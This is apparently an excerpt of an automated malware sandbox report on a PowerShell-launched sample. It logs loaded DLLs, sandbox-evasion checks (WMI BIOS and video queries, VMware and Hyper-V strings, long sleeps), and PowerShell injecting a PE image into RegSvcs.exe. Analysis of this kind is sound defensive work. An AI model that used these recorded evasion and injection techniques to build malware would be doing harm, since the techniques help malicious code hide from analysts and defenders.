      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1915035763.00000219C78C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043904E push ss; ret 3_2_0043904F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B0DE pushad ; retf 3_2_0044B0E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B0DA pushad ; retf 3_2_0044B0DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B0EE push 0800D5C3h; retf 3_2_0044B0FD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B142 pushad ; retf 3_2_0044B145
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B542 pushad ; retf 3_2_0044B545
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044B532 pushad ; retf 3_2_0044B541
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0044F6D9 pushad ; iretd 3_2_0044F6B3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041F77B push es; retf 3_2_0041F781
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00444F80 push eax; mov dword ptr [esp], F0F3F285h3_2_00444F81
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4125Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5733Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
      Source: Amcache.hve.0.drBinary or memory string: VMware
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: RegSvcs.exe, 00000003.00000002.1520232488.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh^!
      Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.drBinary or memory string: vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
      Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00443AB0 LdrInitializeThunk,3_2_00443AB0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 448000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44B000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F00008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
